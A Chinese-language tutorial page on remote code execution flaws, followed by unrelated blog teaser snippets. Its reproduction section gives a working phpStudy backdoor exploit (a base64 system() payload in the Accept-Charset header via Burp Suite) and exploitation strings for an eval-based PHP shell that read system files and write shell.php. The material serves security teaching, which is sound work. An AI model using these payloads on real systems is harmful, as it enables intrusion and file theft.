当前位置：首页 > news >正文

RCE 远程代码执行漏洞分析

news 2026/2/10 16:34:51

RCE 漏洞

1.漏洞描述

Remote Command/Code Execute
远程命令执行/远程代码执行漏洞
这种漏洞通常出现在应用程序或操作系统中，攻击者可以通过利用漏洞注入恶意代码，并在受攻击的系统上执行任意命令。

2.漏洞场景

PHP 代码执行
PHP 代码注入
OS 命令执行
OS 命令注入
Java、Python……
Web 应用程序
远程服务
操作系统漏洞

3.漏洞原理

传入 PHP 代码执行函数的变量，客户端可控，并且没有做严格的过滤。那么攻击者可以随意输入（注入，注射，Inject）想要执行的代码，并且在服务器端执行。如果代码在服务器端执行成功，就认为存在 PHP 代码注入漏洞，也就是 RCE。

4.漏洞危害

继承当前用户权限：

GetShell，执行代码或命令。
读写文件。
反弹Shell。
控制网站。
控制系统。

5.漏洞评级

RCE漏洞通常被评级为高危或严重的漏洞，因为其危害性较大，能够导致系统完全被攻击者控制。

6.漏洞验证

phpstudy_2016-2018_rce_backdoor 漏洞复现
打开 bp
打开代理浏览器
访问 php 页面
回到 bp

查看 http 历史，找到刚刚访问的 php 页面
发送到 Repeater
转到 Repeater
php 页面请求内容加
```
Accept-Charset: 
```
修改 Accept-Encoding，删除 deflate 前的空格
```
Accept-Encoding: gzip,deflate
```
将要执行的命令写入到 system(“”) 中如
```
system("whoami");
```

Decoder 模块 base64 编码

# 对 system("whoami") 编码
c3lzdGVtKCJ3aG9hbWkiKTs=

将编码放到 Accept-Charset: 后

Accept-Charset: c3lzdGVtKCJ3aG9hbWkiKTs=

点击 Send 发送
查看返回的数据
成功回显执行的命令

7.漏洞利用

代码执行漏洞的利用方式有很多种。

获取Shell，蚁剑可以直接连接。

shell: http://10.4.7.187/php/functions/eval.php
pass: code

获取当前文件的绝对路径。

?code=print(__FILE__);

读文件。

?code=print(file_get_contents('eval.php'));
?code=print(file_get_contents('c:/windows/system32/drivers/etc/hosts'));

写文件。

?code=file_put_contents('shell.php','<?php phpinfo();?>');
?code=file_put_contents(要写入的文件,要写入的内容)

8.漏洞防御

尽量避免使用危险函数
对用户输入的数据进行严格的验证和过滤，确保只接受预期的输入。
限制应用程序或系统的权限，确保用户或攻击者无法执行危险的操作。
及时更新和修复应用程序、操作系统和依赖库中的漏洞，以减少攻击面。
输入验证、输出转义、防止代码注入等。

9.典型案例

2017年Equifax数据泄露事件：攻击者利用RCE漏洞入侵了Equifax的服务器，窃取了超过1亿个消费者的敏感信息。
2014年Shellshock漏洞：Shellshock是一个影响Bash（Unix和Linux操作系统中的一种Shell）的RCE漏洞，攻击者可以通过恶意环境变量注入恶意代码并执行任意命令。
2010年Stuxnet蠕虫：Stuxnet是一种利用RCE漏洞的恶意软件，攻击了伊朗的核设施，导致严重的设备损坏。

RCE 远程代码执行漏洞分析

RCE 漏洞 1.漏洞描述 Remote Command/Code Execute 远程命令执行/远程代码执行漏洞这种漏洞通常出现在应用程序或操作系统中，攻击者可以通过利用漏洞注入恶意代码，并在受攻击的系统上执行任意命令。 2.漏洞场景 PHP 代码执行PHP 代码注入OS 命令执…...

编程日记 2023/10/26 0:28:55

JDK8新特性：Stream流

目录 1.获取Stream流 2.Stream流常见的中间方法 3.Stream流常见的终结方法 1、 Stream 是什么？有什么作用？结合了什么技术？ ●也叫 Stream 流，是Jdk8开始新增的一套 API ( java . util . stream .*)，可以用于操作集…...

编程日记 2023/10/26 0:27:54

【.net core】yisha框架单页面双列表联动效果示例

gridTable1列表数据为gridTable别表数据的子数据，点击gridTable时gridTable1列表数据更新， {Layout "~/Views/Shared/_Index.cshtml";} <div class"container-div"><div class"row"><div id"search…...

编程日记 2023/10/26 0:26:52

01. 板载硬件资源和开发环境

一、板载硬件资源 STM32F4VGT6-DISCOVERY硬件资源如下： (1). STM32F407VGT6微控制器有1M的FLASH存储器，192K的RAM，LQFP100封装 (2). 板上的ST-LINK_V2可以使用选择的方式把套件切换成一个独立的ST-LINK/V2来使用（可以使用SWD…...

编程日记 2023/10/26 0:25:51

BlobDetector的使用与参数说明（OpenCV/C++）

通过opencv的BlobDetector方法可以检测斑点、圆点、椭圆等形状以下是使用方式及代码说明： 1、导入必要的OpenCV库和头文件。 #include <opencv2/opencv.hpp> #include <opencv2/blob/blobdetector.hpp>2、读取图像并将其转换为灰度图像。 cv::Mat…...

编程日记 2023/10/26 0:24:50

行为型模式-空对象模式

在空对象模式（Null Object Pattern）中，一个空对象取代 NULL 对象实例的检查。Null 对象不是检查空值，而是反应一个不做任何动作的关系。这样的 Null 对象也可以在数据不可用的时候提供默认的行为。在空对象模式中，我…...

编程日记 2023/10/26 0:23:49

爬虫采集如何解决ip被限制的问题呢？

在进行爬虫采集的过程中，很多开发者会遇到IP被限制的问题，这给采集工作带来了很大的不便。那么，如何解决这个问题呢？下面我们将从以下几个方面进行探讨。一、了解网站的反爬机制首先，我们需要了解目标网站的反爬机制…...

编程日记 2023/10/26 0:22:48

文章目录 1.1 Q_Channel 概述1.2 Q-Channel1.2.1 Q-Channel 接口1.2.2 Q-Channel 接口的握手状态1.2.3 握手信号规则 1.3 P_Channel的握手协议1.3.1 device 接受 PMU 的 power 请求1.3.2 device 拒绝 PMU 的 power 请求 1.4 device 复位信号与 Q _Channel 的结合1.4.1 RESETn 复…...

编程日记 2023/10/26 0:21:48

PDF Reader Pro v2.9.8(pdf编辑阅读器)

PDF Reader Pro是一款PDF阅读和编辑软件，具有以下特点： 界面设计简洁，易于上手。软件界面直观清晰，用户可以轻松浏览文档，编辑注释和填写表单。功能强大，提供了多种PDF处理工具，包括阅读、注释…...

编程日记 2023/10/26 0:20:46

【机器学习可解释性】1.模型洞察的价值

机器学习可解释性 1.模型洞察的价值2.排列的重要性3.部分图表4.SHAP Value5.SHAP Value 高级使用正文前言本文是 kaggle上机器学习可解释性课程，共五部分，除第一部分介绍外，每部分包括辅导和练习。此为第一部分，原文链接如…...

编程日记 2023/10/26 0:19:44

网络安全保险行业面临的挑战与变革

保险业内大多数资产类别的数据可以追溯到几个世纪以前；然而，网络安全保险业仍处于初级阶段。由于勒索软件攻击、高度复杂的黑客和昂贵的数据泄漏事件不断增加，许多网络安全保险提供商开始感到害怕继续承保更多业务。保险行业根据最近的路…...

编程日记 2023/10/26 0:18:42

如何提高系统的可用性/高可用

提高系统可用性常用的一些方法，有缓存、异步、重试、幂等、补偿、熔断、降级、限流。缓存缓存的速度，比数据库快很多，添加缓存是简单有效的做法。注意缓存与数据库的一致性，数据表记录变更时记得处理缓存。 Redis缓存的示例&…...

编程日记 2023/10/26 0:17:41

PCA和LDA数据降维计算(含数学例子推导过程)

PCA算法和LDA算法可以用于对数据进行降维，例如可以把一个2维的数据降低维度到一维，本文通过举例子来对PCA算法和LDA算法的计算过程进行教学展示。 PCA算法计算过程(文字版，想看具体计算下面有例子) 1.将原始数据排列成n行m列的矩阵&#xf…...

编程日记 2023/10/26 0:16:40

题目 1053: 二级C语言-平均值计算（python详解）——练气三层初期

✨博主：命运之光 🦄专栏：算法修炼之练气篇（C\C版） 🍓专栏：算法修炼之筑基篇（C\C版） 🍒专栏：算法修炼之练气篇（Python版） ✨…...

编程日记 2023/10/26 0:15:38

Python —— UI自动化之Page Object模式

1、Page Object模式简介 1、二层模型 Page Object Model（页面对象模型）, 或者也可称之为POM。在UI自动化测试广泛使用的一种分层设计模式。核心是通过页面层封装所有的页面元素及操作，测试用例层通过调用页面层操作组装业务逻辑。 1、实战 …...

编程日记 2023/10/26 0:14:37

职能篇—自动驾驶产品经理

自动驾驶产品开发流程在讲自动驾驶产品经理之前，先简单了解一下自动驾驶的开发体系。如上图所示，从产品需求开始，经由系统需求、系统架构、软件需求、软件架构，最终分解到软件代码实现模块，再经由MIL、SIL、HIL、VIL完…...

编程日记 2023/10/26 0:11:33

ubuntu安装golang

看版本：https://go.dev/dl/ 下载： wget https://go.dev/dl/go1.21.3.linux-amd64.tar.gz卸载已有的go，可以apt remove go，也可以which go之后删除那个go文件，然后： rm -rf /usr/local/go && tar…...

编程日记 2023/10/26 0:09:30

ES 8 新特性

1. async 和 await async 和 await 两种语法结合可以让异步代码像同步代码一样。（即：看起来是同步的，实质上是异步的。）先从字面意思理解，async 意为异步，可以用于声明一个函数前，该函数是异步的。await 意为等待，即等待一个异步方法完成。 1.1 async async 声明（…...

编程日记 2023/10/26 0:08:29

linux-防火墙

目录一、防火墙概念 1.软件防火墙 2.iptables默认规则 3.iptables的五链 4.iptables动作 5.四表五链 6.iptables实例一、防火墙概念 linux下防火墙一般分为软件防火墙、硬件防火墙硬件防火墙：在硬件的级别实现防火墙过滤功能，性能高&#xf…...

编程日记 2023/10/26 0:07:28

Pytorch--3.使用CNN和LSTM对数据进行预测

这个系列前面的文章我们学会了使用全连接层来做简单的回归任务，但是在现实情况里，我们不仅需要做回归，可能还需要做预测工作。同时，我们的数据可能在时空上有着联系，但是简单的全连接层并不能满足我们的需求&#xff0…...

编程日记 2023/10/26 0:05:25

【网络】每天掌握一个Linux命令 - iftop

在Linux系统中，iftop是网络管理的得力助手，能实时监控网络流量、连接情况等，帮助排查网络异常。接下来从多方面详细介绍它。目录【网络】每天掌握一个Linux命令 - iftop工具概述安装方式核心功能基础用法进阶操作实战案例面试题场景生产场景…...

编程新知 2025/10/10 17:03:53

centos 7 部署awstats 网站访问检测

一、基础环境准备（两种安装方式都要做） bash # 安装必要依赖 yum install -y httpd perl mod_perl perl-Time-HiRes perl-DateTime systemctl enable httpd # 设置 Apache 开机自启 systemctl start httpd # 启动 Apache二、安装 AWStats&#xff0…...

编程新知 2026/1/23 8:33:56

【第二十一章 SDIO接口(SDIO)】

第二十一章 SDIO接口目录第二十一章 SDIO接口(SDIO) 1 SDIO 主要功能 2 SDIO 总线拓扑 3 SDIO 功能描述 3.1 SDIO 适配器 3.2 SDIOAHB 接口 4 卡功能描述 4.1 卡识别模式 4.2 卡复位 4.3 操作电压范围确认 4.4 卡识别过程 4.5 写数据块 4.6 读数据块 4.7 数据流…...

编程新知 2026/2/1 13:28:03

SpringTask-03.入门案例

一.入门案例启动类： package com.sky;import lombok.extern.slf4j.Slf4j; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.cache.annotation.EnableCach…...

编程新知 2026/2/2 0:35:08

Rapidio门铃消息FIFO溢出机制

关于RapidIO门铃消息FIFO的溢出机制及其与中断抖动的关系，以下是深入解析： 门铃FIFO溢出的本质在RapidIO系统中，门铃消息FIFO是硬件控制器内部的缓冲区，用于临时存储接收到的门铃消息（Doorbell Message）。…...

编程新知 2026/1/7 1:29:19

大语言模型（LLM）中的KV缓存压缩与动态稀疏注意力机制设计

随着大语言模型（LLM）参数规模的增长，推理阶段的内存占用和计算复杂度成为核心挑战。传统注意力机制的计算复杂度随序列长度呈二次方增长，而KV缓存的内存消耗可能高达数十GB（例如Llama2-7B处理100K token时需50GB内存&a…...

编程新知 2026/1/28 1:40:03

佰力博科技与您探讨热释电测量的几种方法

热释电的测量主要涉及热释电系数的测定，这是表征热释电材料性能的重要参数。热释电系数的测量方法主要包括静态法、动态法和积分电荷法。其中，积分电荷法最为常用，其原理是通过测量在电容器上积累的热释电电荷，从而确定热释电系数…...

编程新知 2026/1/23 11:53:19

基于TurtleBot3在Gazebo地图实现机器人远程控制

1. TurtleBot3环境配置 # 下载TurtleBot3核心包 mkdir -p ~/catkin_ws/src cd ~/catkin_ws/src git clone -b noetic-devel https://github.com/ROBOTIS-GIT/turtlebot3.git git clone -b noetic https://github.com/ROBOTIS-GIT/turtlebot3_msgs.git git clone -b noetic-dev…...

编程新知 2026/2/6 11:54:58